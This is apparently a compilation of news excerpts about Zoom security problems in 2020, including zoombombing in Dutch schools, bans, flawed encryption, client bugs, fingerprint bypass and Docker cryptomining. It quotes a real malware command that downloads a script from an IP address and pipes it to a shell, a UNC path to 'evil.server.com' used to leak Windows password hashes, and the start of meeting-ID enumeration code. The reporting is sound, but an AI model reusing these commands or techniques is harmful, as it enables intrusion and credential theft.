PIJNACKER – Het Stanislascollege in Pijnacker stopt per direct met het gebruik van de video-app Zoom voor het geven van online lessen. De school heeft meerdere berichten ontvangen van leerlingen, ouders en docenten dat er tijdens de lessen beelden of teksten te zien zijn die niet door de beugel kunnen.

Woensdag besloot het Zoetermeerse Erasmus College ook onmiddellijk te stoppen met Zoom, nadat leerlingen pornobeelden te zien kregen tijdens een online les. Het Stanislascollege heeft zes scholen, verdeeld over Delft, Pijnacker en Rijswijk.

‘In de meeste gevallen lijken de beelden of teksten getoond te worden door personen die niet aan de school verbonden zijn en zich onrechtmatig toegang hebben verschaft tot de les’, schrijft de school in een brief aan ouders.

Hitler-snorretje tijdens les Duits

Volgens regiodirecteur Fons Loogman van Stichting Lucas Onderwijs, waar het Stanislascollege onder valt, zijn er kleine incidenten geweest. ‘Leerlingen sturen een uitnodigingslink door aan derden die dan ook mee kunnen kijken met de les, daar heb je dan geen controle op. Zo is er bijvoorbeeld tijdens een les Duits ergens een Hitlergroet of een Hitler-snorretje getoond.’

Het incident met pornobeelden in Zoetermeer was voor de school in Pijnacker echter de doorslag om te stoppen met Zoom. ‘Daarnaast werden we de afgelopen week al attent gemaakt op berichten uit de ICT-wereld dat Zoom niet veilig is. Zo verzamelen ze informatie, zijn er onveilige beveiligingsstructuren en is het makkelijk te hacken’, zegt Loogman.

Source: Stanislascollege Pijnacker stopt ook met Zoom door ‘beelden die niet door de beugel kunnen’ – Omroep West

ZOETERMEER – Leerlingen van een klas van het Zoetermeerse Erasmus College hebben woensdagochtend, tijdens een les via de video-app Zoom, pornobeelden te zien gekregen. De school is onmiddellijk gestopt met het gebruik van Zoom.

‘We snappen dat jullie ontzettend geschrokken zijn’, schrijft de school in een mail aan de betreffende leerlingen. ‘We hebben natuurlijk direct alle Zoom-lessen stopgezet en gaan kijken naar een andere methode om thuis les te geven.’

Directeur-bestuurder Roderik Rot bevestigt dat er pornografische beelden te zien zijn geweest en dat om die reden alle lessen zijn gestopt. ‘Ja, er is één klas geweest, waarbij daarvan kort sprake was.’ Om hoeveel leerlingen het gaat kan Rot niet zeggen: ‘Een klas bestaat nooit uit meer dan dertig leerlingen en meestal is het bij die online lessen zo dat niet alle leerlingen erbij zijn.’ Op de vraag om welke les het ging, wil hij uit privacyoverwegingen niet ingaan. De school bood leerlingen aan om indien gewenst contact op te nemen met een hulpteam, maar daarvan is voor zover bekend door niemand gebruik gemaakt.

Gestopt met online lessen

Het Erasmus College is nu dus meteen gestopt met Zoom. Volgens Rot had de school dat al in gang gezet. Een externe privacyadviseur had al gezegd dat Zoom, onder strikte voorwaarden, te gebruiken was, maar dat hij toch andere programma’s adviseerde. ‘Dus we hebben gisteren de ouders allemaal bericht dat we gaan overstappen naar iets anders. En dat we daar druk mee bezig zijn.’

[…]

ID’s onveilig gedeeld

Volgens het Delftse cybersecuritybedrijf Fox-IT is het onwaarschijnlijk dat Zoom zelf is gehackt. Security-expert Sanne Maasakkers: ‘Zoom is een heel groot softwarebedrijf waar iedere dag veel mensen met de beveiliging bezig zijn.’ Volgens Maasakkers is het aannemelijker dat uitnodigingscodes in handen terecht zijn gekomen van mensen die niet op de vergadering zijn uitgenodigd.

Iedere deelnemer krijgt zo’n ID. Als die niet is beveiligd met een wachtwoord, dan kunnen buitenstaanders inbreken in een Zoom-meeting, wat met een wachtwoord veel moeilijker is, tenzij een deelnemer zelf is gehackt.

Source: Porno tijdens online les van Zoetermeerse school: ‘Onwaarschijnlijk dat Zoom is gehackt’ – Omroep West

Nee, het is niet echt ‘gehackt’ in die zin dat het zo’n slechte beveiliging heeft dat je gewoon een  ID in kan voeren en daar lukraak porno naar kan sturen.

For decades, the use of fingerprints to authenticate users to computers, networks, and restricted areas was (with a few notable exceptions) mostly limited to large and well-resourced organizations that used specialized and expensive equipment. That all changed in 2013 when Apple introduced TouchID. Within a few years, fingerprint-based validation became available to the masses as computer, phone, and lock manufacturers added sensors that gave users an alternative to passwords when unlocking the devices.

Further Reading

Bypassing TouchID was “no challenge at all,” hacker tells Ars

Although hackers managed to defeat TouchID with a fake fingerprint less than 48 hours after the technology was rolled out in the iPhone 5S, fingerprint-based authentication over the past few years has become much harder to defeat. Today, fingerprints are widely accepted as a safe alternative over passwords when unlocking devices in many, but not all, contexts.

A very high probability

A study published on Wednesday by Cisco’s Talos security group makes clear that the alternative isn’t suitable for everyone—namely those who may be targeted by nation-sponsored hackers or other skilled, well-financed, and determined attack groups. The researchers spent about $2,000 over several months testing fingerprint authentication offered by Apple, Microsoft, Samsung, Huawei, and three lock makers. The result: on average, fake fingerprints were able to bypass sensors at least once roughly 80 percent of the time.

The percentages are based on 20 attempts for each device with the best fake fingerprint the researchers were able to create. While Apple Apple products limit users to five attempts before asking for the PIN or password, the researchers subjected the devices to 20 attempts (that is, multiple groups of from one or more attempts). Of the 20 attempts, 17 were successful. Other products tested permitted significantly more or even an unlimited number of unsuccessful tries.

Tuesday’s report was quick to point out that the results required several months of painstaking work, with more than 50 fingerprint molds created before getting one to work. The study also noted that the demands of the attack—which involved obtaining a clean image of a target’s fingerprint and then getting physical access to the target’s device—meant that only the most determined and capable adversaries would succeed.

“Even so, this level of success rate means that we have a very high probability of unlocking any of the tested devices before it falls back into the PIN unlocking,” Talos researchers Paul Rascagneres and Vitor Ventura wrote. “The results show fingerprints are good enough to protect the average person’s privacy if they lose their phone. However, a person that is likely to be targeted by a well-funded and motivated actor should not use fingerprint authentication.”

Source: Attackers can bypass fingerprint authentication with an ~80% success rate | Ars Technica

Google has banned the popular videoconferencing software Zoom from its employees’ devices, BuzzFeed News has learned. Zoom, a competitor to Google’s own Meet app, has seen an explosion of people using it to work and socialize from home and has become a cultural touchstone during the coronavirus pandemic.

Last week, Google sent an email to employees whose work laptops had the Zoom app installed that cited its “security vulnerabilities” and warned that the videoconferencing software on employee laptops would stop working starting this week.

“We have long had a policy of not allowing employees to use unapproved apps for work that are outside of our corporate network,” Jose Castaneda, a Google spokesperson, told BuzzFeed News. “Recently, our security team informed employees using Zoom Desktop Client that it will no longer run on corporate computers as it does not meet our security standards for apps used by our employees. Employees who have been using Zoom to stay in touch with family and friends can continue to do so through a web browser or via mobile.”

Source: Google Bans Zoom Videoconferencing Software From Employees’ Computers

A padlock—whether it uses a combination, a key, or “smart” tech—has exactly one job: to keep your stuff safe so other people can’t get it. Tapplock, Inc., based in Canada, produces such a product. The company’s locks unlock with a fingerprint or an app connected by Bluetooth to your phone. Unfortunately, the Federal Trade Commission said, the locks are full of both digital and physical vulnerabilities that leave users’ stuff, and data, at risk.

The FTC’s complaint (PDF) against Tapplock, released Monday, basically alleges that the company misrepresented itself, because it marketed its products as secure and tested when they were neither. A product—any product—simply being kind of crappy doesn’t necessarily fall under the FTC’s purview. Saying untrue things about your product in your advertisement or privacy policy, however, will make the commission very unhappy with you indeed.

“We allege that Tapplock promised that its Internet-connected locks were secure, but in fact the company failed to even test if that claim was true,” Andrew Smith, director of the FTC’s Bureau of Consumer Protection, said in a written statement. “Tech companies should remember the basics—when you promise security, you need to deliver security.”

Tapplock’s advertisements say its flagship product, the Tapplock One, can store up to 500 user fingerprints and can be connected to an “unlimited” number of devices through the app—a design optimized for something many people need to be able to access and for which handing off a physical key is impractical. To make the $99 lock work, Tapplock collects a great deal of personal information on its users, including usernames, email addresses, profile photos, location history, and the precise location of a user’s lock.

[…]

The lock may be built with “7mm reinforced stainless steel shackles, strengthened by double-layered lock design with anti-shim and anti-pry technologies,” as Tapplock’s website promises, but according to the FTC, perhaps it should have considered anti-screwdriver technologies. As it turns out, a researcher was able to unlock the lock “within a matter of seconds” by unscrewing the back panel. Oops.

The complaint also pointed to several “reasonably foreseeable” software vulnerabilities that the FTC alleges Tapplock could have avoided if the company “had implemented simple, low-cost steps.”

One vulnerability security researchers identified allowed a user to bypass the account authentication process entirely in order to gain full access to the account of literally any Tapplock user, including their personal information. And how could this happen? “A researcher who logged in with a valid user credential could then access another user’s account without being re-directed back to the login page, thereby allowing the researcher to circumvent Respondent’s authentication procedures altogether,” the complaint explains.

A second vulnerability allowed researchers the ability to access and unlock any lock they could get close enough to with a working Bluetooth connection. That’s because Tapplock “failed to encrypt the Bluetooth communication between the lock and the app,” leaving the data wide open for the researchers to discover and replicate.

The third vulnerability outlined in the complaint also has to do with a failure to secure communication data. That app that allows “unlimited” connections? The primary owner can of course add and revoke authorized users from the lock. But someone whose access was revoked could still access the lock because the vulnerability allowed for sniffing out the relevant data packets.

How’d this happen?

And how did Tapplock fail to discover any of these weaknesses? Because the company did not have a security program prior to the third-party researchers’ discoveries, the FTC alleges.

Source: Easy-to-pick “smart” locks gush personal data, FTC finds | Ars Technica

Zoom has been banned from government business in Taiwan in the latest setback for the hugely popular video-calling app.

It follows revelations that some Zoom traffic was “mistakenly” routed through China, which does not recognise Taiwan’s independence.

Taiwan’s government said public bodies should not use products with security concerns “such as Zoom”.

But competitors like Google and Microsoft were acceptable, it said.

China considers Taiwan a breakaway rebel province, destined to be reunited with the mainland.

Last week, researchers discovered that some traffic from the video-calling app was being sent through Beijing – even when all participants on the Zoom call were in North America.

The team from University of Toronto’s Citizen Lab also highlighted that Zoom has several hundred employees in mainland China, which “could also open up Zoom to pressure from Chinese authorities”.

Zoom said the traffic was “mistakenly” routed through Beijing, and apologised.

Despite the response from Zoom, Taiwan has told its public institutions to use other software.

Where possible, domestic solutions should be used, it said, adding that in special circumstances, Google or Microsoft’s apps were acceptable. Those firms operate the Duo and Skype services respectively.

It is the latest blow to Zoom, which has exploded in popularity during the coronavirus pandemic, resulting in increased scrutiny.

Source: Zoom banned by Taiwan’s government over China security fears – BBC News

Some Docker installations are getting hammered by malware skiddies hoping to mine digital cash using other people’s CPU time.

Infosec outfit Aqua – no, not the Barbie Girl band – said miscreants have spotted that a decent number of Docker deployments are lazily or inadvertently exposing the daemon API port to the public internet with no protection. It’s a fairly common error that hackers have exploited in the past to mine digital coins, although lately we’re told there have been thousands of infection attempts daily via this interface, all involving a piece of Linux malware dubbed Kinsing.

“These are the highest numbers we’ve seen in some time, far exceeding what we have witnessed to date,” noted researcher Gal Singer this week.

“We therefore believe that these attacks are directed by actors with sufficient resources and the infrastructure needed to carry out and sustain such attacks, and that this is not an improvised endeavor.”

If an open system is found, the attacker tells it to create and run a custom Ubuntu container that executes the following command:

/bin/bash -c apt-get update && apt-get install -y wget cron;service cron start; wget -q -O - 142.44.191.122/d.sh | sh;tail -f /dev/null

The fetched d.sh script disables SELINUX security protections, as well as searches out and removes any other malware or cryptomining containers already running on the infected machine. That way it won’t have to compete for CPU time. It uses crontab to ensure it stays running every minute, and a bunch of other stuff: it’s 600 lines long.

The script also downloads the Kinsing malware proper, and runs it. This software nasty tries to make contact with one of four command and control servers in Eastern Europe for any special orders to carry out on the infected system. It also runs a script, called spre.sh, that uses any SSH keys it finds to log into and spread to other machines to run its code.

“The spre.sh shell script that the malware downloads is used to laterally spread the malware across the container network,” Aqua’s Singer said.

“In order to discover potential targets and locate the information it needs to authenticate against, the script passively collects data from /.ssh/config, .bash_history, /.ssh/known_hosts, and the likes. We did not identify any active scanning techniques used to identify additional targets.”

Once that is done, the mining component of the malware is finally executed.

A diagram of the attack process
click to enlarge

The Register has pinged Docker for comment on the attacks. In the meantime, Singer and Aqua recommend blocking the IP addresses linked to this outbreak. It’s also highly recommended you don’t leave the daemon API port facing the internet, and use policies and configurations to limit what systems are allowed to talk to the interface.

“Identify all cloud resources and group them by some logical structure,” said the team. “Review authorization and authentication policies, basic security policies, and adjust them according to the principle of least privilege. Investigate logs, mostly around user actions, look for actions you can’t account for anomalies.” ®

Source: If you don’t cover your Docker daemon API port you’ll have a hell of a time… because cryptocreeps are hunting for it • The Register

After many schools adopted Zoom to conduct online lessons during the coronavirus lockdown, concerns about security and privacy have led to a ban on the video conferencing software across the US.

The chancellor of New York City’s Department of Education Richard A Carranza sent an email to school principals telling them to “cease using Zoom as soon as possible”. And he is not alone; schools in other parts of the country have taken similar action, and educators are now being trained to use Microsoft Teams as this has been suggested as a suitable alternative, partly because it is compliant with FERPA (Family Educational Rights and Privacy Act).

See also:

• Zoom enables meeting passwords and virtual waiting rooms by default as it attempts to beef up security
• Zoom admits to routing some US calls through China
• How to lock down Zoom to improve your privacy and security

Large numbers of teachers spent time learning how to use Zoom to continue educating pupils who are confined to their homes. But growing criticism of Zoom for its approach to privacy and security has given cause for a rethink. Documents seen by Chalkbeat show that principals in NYC have been told: “Based on the DOE’s review of those documented concerns, the DOE will no longer permit the use of Zoom at this time”.

The Washington Post quotes Danielle Filson, spokesperson for the NYC Education Department, as saying:

Providing a safe and secure remote learning experience for our students is essential, and upon further review of security concerns, schools should move away from using Zoom as soon as possible. There are many new components to remote learning, and we are making real-time decisions in the best interest of our staff and student. We will support staff and students in transitioning to different platforms such as Microsoft Teams that have the same capabilities with appropriate security measures in place.

The Post also reports that Clark County Public Schools in Nevada were also moving away from Zoom, saying in a statement that the decision had been taken to ” disable access to Zoom out of an abundance of caution due to instances of hacking that created unsafe environments for teachers and students”.

Schools in Utah, Washington state and beyond are also looking into Zoom alternatives.

Source: American schools are banning Zoom and switching to Microsoft Teams

Meetings on Zoom, the increasingly popular video conferencing service, are encrypted using an algorithm with serious, well-known weaknesses, and sometimes using keys issued by servers in China, even when meeting participants are all in North America, according to researchers at the University of Toronto.

The researchers also found that Zoom protects video and audio content using a home-grown encryption scheme, that there is a vulnerability in Zoom’s “waiting room” feature, and that Zoom appears to have at least 700 employees in China spread across three subsidiaries. They conclude, in a report for the university’s Citizen Lab — widely followed in information security circles — that Zoom’s service is “not suited for secrets” and that it may be legally obligated to disclose encryption keys to Chinese authorities and “responsive to pressure” from them.

Source: Zoom’s Flawed Encryption Linked to China

For those unaware, Zoom officially has a porn problem. The multibillion-dollar video messaging mainstay among employees at Johnson & Johnson and the Department of Homeland Security—not to mention a household name among currently house-bound citizens across the country—has been rocked by story after story of pranksters popping into video meetings with clips of graphic porn or Nazi memorabilia. None of Zoom’s clients, seemingly, are safe: These Zoom bombs have hit city council members and churches alike. They’ve hit Chipotle.

The idea of having our work-from-home happy hours disrupted by someone splicing in something porn-y or Hitler-y is disturbing, and that’s where it usually ends: annoyance, disgust, shock—which is ultimately the response that these posters are trying to incite. But a Gizmodo investigation into multiple Discord chatrooms dedicated to coordinating these attacks revealed that the practice has a far darker side that can leave victims scarred for life—or far worse.

Zoom-based “bombs” and “raids” are typically the forte of high and middle school students whose classes are now almost exclusively taking place on the platform. From last month onward, Zoom’s rolled out a series of changes specifically catering to the educators it has onboard, from lifting the 40-minute limit on free meetings internationally to partnering with Logitech to offer free cameras and headsets to teachers who might need them. This gesture of goodwill promptly blew up in the company’s face when these students quickly realized that the codes and passwords needed to access a given Zoom meeting could be freely shared, leading a select few to coordinate with other students nationwide to spearhead a wave of raids in classrooms across the country.

Teens, in general, have a thing for Discord, a popular chat platform, and Discord is where these raids are coordinated. The platform’s long track record of raids on every platform led it to wedge a statement into its community guidelines explicitly disavowing raids as a “form of harassment.” Now that those raids have hit Zoom, Discord’s been actively booting off some users that are particularly active in a given raid channel, while unceremoniously shutting those channels down left and right.

This crackdown, along with the shuttering of raid-based communities on Reddit like the creatively named r/zoomraids, means that a lot of these channels are hard to find, and that finding them isn’t a guarantee that it’ll exist the next day. Over the course of this story, Gizmodo joined about 15 raid channels—some racking up more than 800 members a pop. By the time you’re reading this, there are at most six left standing—and for the most part, they are hidden behind server names that don’t mention Zoom at all. Discord told Gizmodo in an email that it had removed more than 350 servers for Zoom bombing just this morning.

“This behavior violates Discord’s terms of service, and we strongly condemn it,” a spokesperson told Gizmodo in a statement. “Once we identify those servers engaging in this sort of activity, we quickly investigate and take action, including removing content, banning users and shutting down those servers.”

The bulk of these servers, overall, are made up of teens not only swapping Zoom links back and forth but overall just… being typical edgelord teens—joking about the Holocaust (ironically), using racial slurs (ironically), and sharing a ton of porn (ironically?). Less ironic, but just as dark, are the materials shared back and forth to make these campaigns a reality. Multiple channels that Gizmodo joined had created a roster of Google documents listing the Zoom codes of hundreds of support groups in the U.S., along with the days and times each one would meet. Similar documents were created to target meetings for other at-risk groups, like LGBTQ and trans teens.

Depending on who you ask, raids on recovery groups are either lame, funny, fucked, or some combination of the three. Each of the Discord channels had a list of rules seemingly tailored to throw admins off the scent of the channel’s true purpose. One server’s rulebook stated that its one goal was to “support our fellow students and adults through their hard day of work by surprising them in their online meetings.” Another server for raid planning included the rule, “DO NOT RAID I DO NOT CONDONE IT.”

In many of the channels, all Zoom calls are fair game, whether it’s a Narcotics Anonymous meeting or a kindergarten classroom. Rules aside, the only limit to what’s being shared is in the hands of the poster: Some think playing footage of the 2019 Christchurch Mosque shooting in the middle of an NA meeting is a bridge too far, while others don’t. Some think exposing 9- and 10-year-olds to hardcore porn is too shitty, while others think the line should be drawn at middle schoolers and above.

As one user put it, “this discord freakin showed porn to kindergardners but wont raid an narcotics [anonymous]? y’all soft.”

While Zoom’s yet to respond to our request for comment, the company is undoubtedly aware of its raiding problem. Late last month, it put out an official blog post about “keeping uninvited guests” out of Zoom meetings, which reminds users, “When you share your meeting link on social media or other public forums, that makes your event … extremely public. ANYONE with the link can join your meeting.”

Some of the channels Gizmodo joined did, indeed, set up scrapers and dedicated bots specifically to monitor a Zoom link shared on a given platform. But just as many used a much easier tool: Google search. As confirmed by Gizmodo, public-facing Zoom links share a specific string of characters that, when plugged into Google search (or “dorked,” in internet parlance), will turn up dozens of upcoming Zoom meetings. Trying the search term ourselves, we were able to pull links for Zooms dedicated to hot yoga, wine tasting, and legal advice—all in less than a minute—not to mention more than a few Zoom’s dedicated to parents and their kids.

Putting young children at risk of exposure to horrifying imagery comes up more frequently than you’d might think since Zoom’s teacher-friendly packages apply for preschool teachers as much as it does for college professors. And just like Zoom bombings aimed at high school classes, the reactions of these young children can be passed around in videos recorded by the bombers. In the barely 24 hours we spent joining more than a dozen channels, one video—which showed the confused reactions of second graders being exposed to graphic hardcore pornography in the middle of their class—was frequently shared.

For what should be obvious reasons, we didn’t join any of the many, many raids linked at any given time, so we can’t specify what other young children might be seeing. If we’re assuming the worst, then that means some kids on these video calls are being exposed to footage of decapitation or shootings from sites like Bestgore and LiveLeak, along with any porn scenario you can imagine. Assuming the best-case scenario, the porn’s still there, but the murders aren’t. In either case, kids are at risk: Psychologists have been telling us for years that exposing children to hardcore pornography bumps up the chance that they’ll both become either the victim of sexual assault or end up assaulting someone themselves. Children who see the types of horrific violence you’d find on any gore site can haunt them for the rest of their lives, leading to PTSD or drug abuse.

And when it comes to meetings involving drug abuse, the harm done by these kinds of bombings cannot be overstated. As one Business Insider employee—and Alcoholics Anonymous member—recently explained, the isolation that comes with coronavirus-mandated quarantines is incredibly dangerous for those struggling with addiction:

We are all in our separate homes. And that can be dangerous, because alcoholics are notorious for isolating, for withdrawing from social situations — sometimes with a bottle.

If you drink normally, you may be wondering, ‘Why not just drink — even if you have a problem? Right now, while locked down, who could that hurt?’ I can answer that. I drank myself into the emergency room years ago. I know many people who did. Do you think hospitals need that right now? Do you think healthcare workers need to deal with millions of people whose immune systems are severely compromised by binge drinking?

The risk of relapse doesn’t just come for alcoholics, but anyone with any addiction. As one recent Rolling Stone report detailed, these sorts of weekly meetings can turn into not only a place to discuss their road to recovery but also a place that feels safe to talk about their inarguably valid fears surrounding the current pandemic. When that support line is intercepted—by an edgy teen or otherwise—a recovering addict can lose that tenuous feeling of safety and withdraw from meetings with the support group keeping them clean.

Without that network, some folks fare well and others don’t, with relapse being a bigger risk to those earlier on in recovery, as the Business Insider report explains. For some addictions—like opioids, a relapse can turn deadly shockingly fast. As pointed out by the Centers for Disease Control in 2018, some 70 percent of the tens of thousands of annual drug overdoses in the U.S. happen because of opiate addiction.

Of course, people being dangerously shitty to each other is nothing new. Nor are online pranks. What makes Zoom bombing so wretched is that it’s happening at a time when millions of us are stuck inside with nowhere to go except, perhaps, into a video call with our friends and family, teachers, and support communities—our last tethers to the lives we used to have.

Source: Zoom Bombings Started Off as Pranks. Now Someone Could End Up Dead

Apple patched the vulnerabilities in January and March updates. But before the fixes, all a victim would have needed to do is click one malicious link and an attacker would have been able to spy on them remotely.

“Safari encourages users to save their preferences for site permissions, like whether to trust Skype with microphone and camera access,” says Ryan Pickren, the security researcher who disclosed the vulnerabilities to Apple. “So what an attacker could do with this kill chain is make a malicious website that from Safari’s perspective could then turn into ‘Skype’. And then the malicious site will have all the permissions that you previously granted to Skype, which means an attacker could just start taking pictures of you or turn on your microphone or even screen-share.”

The bugs Pickren found all stem from seemingly minor oversights. For example, he discovered that Safari’s list of the permissions a user has granted to websites treated all sorts of URL variations as being part of the same site, like https://www.example.com, http://example.com, and fake://example.com. By “wiggling around,” as Pickren puts it, he was able to generate specially crafted URLs that could work with scripts embedded in a malicious site to launch the bait-and-switch that would trick Safari.

“I just kind of hammered the browser with really weird cases until Safari got confused and gave an origin that didn’t make sense,” he says. “And eventually the bugs could all kind of bounce from one to the next. Part of this is that some of the bugs were really, really old flaws in the WebKit core from years ago. They probably were not as dangerous as they are now just because the stars lined up on how an attacker would use them today.”

A hacker who tricked a victim into clicking their malicious link would be able to quietly launch the target’s webcam and microphone to capture video, take photos, or record audio. And the attack would work on iPhones, iPads, and Macs alike. None of the flaws are in Apple’s microphone and webcam protections themselves, or even in Safari’s defenses that keep malicious sites from accessing the sensors. Instead, the attack surmounts all of these barriers just by generating a convincing disguise.

Pickren submitted seven vulnerabilities to Apple’s bug bounty program in mid-December and says he got a response that the company had validated the bugs the next day. While an attacker would only exploit three of the bugs to take over webcams in the chain Pickren envisioned, he found other, related flaws along the way that he submitted as well. Pickren says that part of the reason he encountered so many extra bugs was that he was looking for an attack chain that would work on both iOS and macOS—and Safari is designed slightly differently for each.

Source: A Hacker Found a Way to Take Over Any Apple Webcam | WIRED

Zoom’s troubled year just got worse.

Now that a large portion of the world is working from home to ride out the coronavirus pandemic, Zoom’s popularity has rocketed, but also has led to an increased focus on the company’s security practices and privacy promises. Hot on the heels of two security researchers finding a Zoom bug that can be abused to steal Windows passwords, another security researcher found two new bugs that can be used to take over a Zoom user’s Mac, including tapping into the webcam and microphone.

Patrick Wardle, a former NSA hacker and now principal security researcher at Jamf, dropped the two previously undisclosed flaws on his blog Wednesday, which he shared with TechCrunch.

The two bugs, Wardle said, can be launched by a local attacker — that’s where someone has physical control of a vulnerable computer. Once exploited, the attacker can gain and maintain persistent access to the innards of a victim’s computer, allowing them to install malware or spyware.

Wardle’s first bug piggybacks off a previous finding. Zoom uses a “shady” technique — one that’s also used by Mac malware — to install the Mac app without user interaction. Wardle found that a local attacker with low-level user privileges can inject the Zoom installer with malicious code to obtain the highest level of user privileges, known as “root.”

Those root-level user privileges mean the attacker can access the underlying macOS operating system, which are typically off-limits to most users, making it easier to run malware or spyware without the user noticing.

The second bug exploits a flaw in how Zoom handles the webcam and microphone on Macs. Zoom, like any app that needs the webcam and microphone, first requires consent from the user. But Wardle said an attacker can inject malicious code into Zoom to trick it into giving the attacker the same access to the webcam and microphone that Zoom already has. Once Wardle tricked Zoom into loading his malicious code, the code will “automatically inherit” any or all of Zoom’s access rights, he said — and that includes Zoom’s access to the webcam and microphone.

“No additional prompts will be displayed, and the injected code was able to arbitrarily record audio and video,” wrote Wardle.

Because Wardle dropped detail of the vulnerabilities on his blog, Zoom has not yet provided a fix. Zoom also did not respond to TechCrunch’s request for comment.

In the meanwhile, Wardle said, “if you care about your security and privacy, perhaps stop using Zoom.”

Source: Ex-NSA hacker drops new zero-day doom for Zoom | TechCrunch

Today, news of a Zoom issue affecting Microsoft Windows users. The Zoom Windows client is at risk from a flaw in the chat feature that could allow attackers to steal the logins of people who click on a link, according to tech site Bleeping Computer.

When using Zoom, it’s possible for people to communicate with each other via text message in a chat interface. When a chat message is sent containing a URL, this is converted into a hyperlink that others can click on to open a webpage in their browser.

But the Zoom client apparently also turns Windows networking Universal Naming Convention (UNC) paths into a clickable link in the chat messages, security researcher @_g0dmode has found.

MORE FROM FORBESBeware Zoom Users: Here’s How People Can ‘Zoom-Bomb’ Your ChatBy Kate O’Flaherty

Ok, so what’s the problem?

Bleeping Computer demonstrated how regular URL and the UNC path of \\evil.server.com\images\cat.jpg were both converted into a clickable link in the chat message.

The problem with this is, according to Bleeping Computer: “When a user clicks on a UNC path link, Windows will attempt to connect to a remote site using the SMB file sharing protocol to open the remote cat.jpg file.”

And at the same time, by default, Windows sends a user’s login name and NTLM password hash. This can be cracked fairly easily by an attacker to reveal your password.

Security researcher Matthew Hickey posted an example of exploiting the Zoom Windows client using UNC path injection on Twitter.

Source: Zoom User Warning: This Is How Attackers Could Steal Windows Passwords

Every day, a new Zoom security or privacy issue emerges. At least, that’s the way it seems during the COVID-19 crisis as an increasing number of people use the Zoom video conferencing app while working from home.

Soon after a security problem was disclosed that could allow attackers to steal Windows passwords, another researcher has identified two issues that can be used to take over a Zoom user’s Mac–and the microphone and webcam, according to TechCrunch.

The two bugs found by security researcher Patrick Wardle can be used by a local attacker able to gain physical control of a vulnerable Mac. By exploiting the bugs, the adversary can gain access to your computer and install malware or spyware, he wrote in a blog published today.

The first bug is based on another finding by @c1truz_, technical lead at a U.S. threat detection firm called VMRay. He said earlier this week on Twitter: “Ever wondered how the @zoom_us macOS installer does its job without you ever clicking install? Turns out they (ab)use preinstallation scripts, manually unpack the app using a bundled 7zip and install it to /Applications if the current user is in the admin group (no root needed).”

Source: Zoom Users Beware: Here’s How A Flaw Allows Attackers To Take Over Your Mac Microphone And Webcam

For almost three years, OpenWRT—the open source operating system that powers home routers and other types of embedded systems—has been vulnerable to remote code-execution attacks because updates were delivered over an unencrypted channel and digital signature verifications are easy to bypass, a researcher said.

OpenWRT has a loyal base of users who use the freely available package as an alternative to the firmware that comes installed on their devices. Besides routers, OpenWRT runs on smartphones, pocket computers and even laptops and desktop PCs. Users generally find OpenWRT to be a more secure choice because it offers advanced functions and its source code is easy to audit.

Security researcher Guido Vranken, however, recently found that updates and installation files were delivered over unencrypted HTTPs connections, which are open to attacks that allow adversaries to completely replace legitimate updates with malicious ones. The researcher also found that it was trivial for attackers with moderate experience to bypass digital-signature checks that verify a downloaded update as the legitimate one offered by OpenWTR maintainers. The combination of those two lapses makes it possible to send a malicious update that vulnerable devices will automatically install.

Exploits not for everyone

These code-execution exploits are limited in their scope because adversaries must either be in a position to conduct a man-in-the-middle attack or tamper with the DNS server that a device uses to find the update on the Internet. That means routers on a network that has no malicious users and using a legitimate DNS server are safe from attack. Vranken also speculates that packet spoofing or ARP cache poisoning may also make attacks possible, but he cautions that he didn’t test either method.

Source: OpenWRT code-execution bug puts millions of devices at risk | Ars Technica

Popular video-conferencing Zoom is leaking personal information of at least thousands of users, including their email address and photo, and giving strangers the ability to attempt to start a video call with them through Zoom.

The issue lies in Zoom’s “Company Directory” setting, which automatically adds other people to a user’s lists of contacts if they signed up with an email address that shares the same domain. This can make it easier to find a specific colleague to call when the domain belongs to an individual company. But multiple Zoom users say they signed up with personal email addresses, and Zoom pooled them together with thousands of other people as if they all worked for the same company, exposing their personal information to one another.

“I was shocked by this! I subscribed (with an alias, fortunately) and I saw 995 people unknown to me with their names, images and mail addresses.” Barend Gehrels, a Zoom user impacted by the issue and who flagged it to Motherboard, wrote in an email.

Gehrels provided a redacted screenshot of him logged into Zoom with the nearly 1000 different accounts listed in the “Company Directory” section. He said these were “all people I don’t know of course.” He said his partner had the same issue with another email provider, and had over 300 people listed in her own contacts.

“If you subscribe to Zoom with a non-standard provider (I mean, not Gmail or Hotmail or Yahoo etc), then you get insight to ALL subscribed users of that provider: their full names, their mail addresses, their profile picture (if they have any) and their status. And you can video call them,” Gehrels said. A user still has to accept the call from the stranger for it to start, however.

A redacted screenshot of the Company Directory issue provided by Gehrels. Image: Motherboard

On its website, Zoom says, “By default, your Zoom contacts directory contains internal users in the same organization, who are either on the same account or who’s email address uses the same domain as yours (except for publicly used domains including gmail.com, yahoo.com, hotmail.com, etc) in the Company Directory section.”

Zoom’s system does not exempt all domains that are used for personal email, however. Gehrels said he encountered the issue with the domains xs4all.nl, dds.nl, and quicknet.nl. These are all Dutch internet service providers (ISPs) which offer email services.

On Twitter Motherboard found other instances of Dutch users reporting the same issue.

“I just had a look at the free for private use version of Zoom and registered with my private email. I now got 1000 names, email addresses and even pictures of people in the company Directory. Is this intentional?,” one user tweeted last week along with a screenshot.

Dutch ISP XS4ALL tweeted in response to a complaint on Sunday, “This is something we cannot disable. You could see if Zoom can help you with this.”

Do you know anything about data selling or trading? We’d love to hear from you. Using a non-work phone or computer, you can contact Joseph Cox securely on Signal on +44 20 8133 5190, Wickr on josephcox, OTR chat on jfcox@jabber.ccc.de, or email joseph.cox@vice.com.

Dutch ISP DDS told Motherboard in an email it was aware of the issue, but hadn’t heard directly from any of their own customers about it.

“Zoom maintains a blacklist of domains and regularly proactively identifies domains to be added,” a Zoom spokesperson told Motherboard. “With regards to the specific domains that you highlighted in your note, those are now blacklisted.” They also pointed to a section of the Zoom website where users can request other domains to be removed from the Company Directory feature.

Source: Zoom is Leaking Peoples’ Email Addresses and Photos to Strangers – VICE

In this publication we describe a technique which would have allowed a threat actor to potentially identify and join active meetings.

All the details discussed in this publication were responsibly disclosed to Zoom Video Communications, Inc. In response, Zoom introduced a number of mitigations, so this attack is no longer possible.

The Problem

If you use Zoom, you may already know that Zoom Meeting IDs are composed of 9, 10 or 11 digits. The problem was that if you hadn’t enabled the “Require meeting password” option or enabled Waiting Room, which allows manual participants admission, these 9-10-11 digits were the only thing that secured your meeting i.e. prevented an unauthorized person from connecting to it.

Let Me Guess…
The first thing we did was pre-generate the list of potentially valid Zoom Meeting IDs. We took 1000 “random” Meeting IDs and prepared the URL string for joining the meeting here as well:

urls = []
for _ in range(1000):
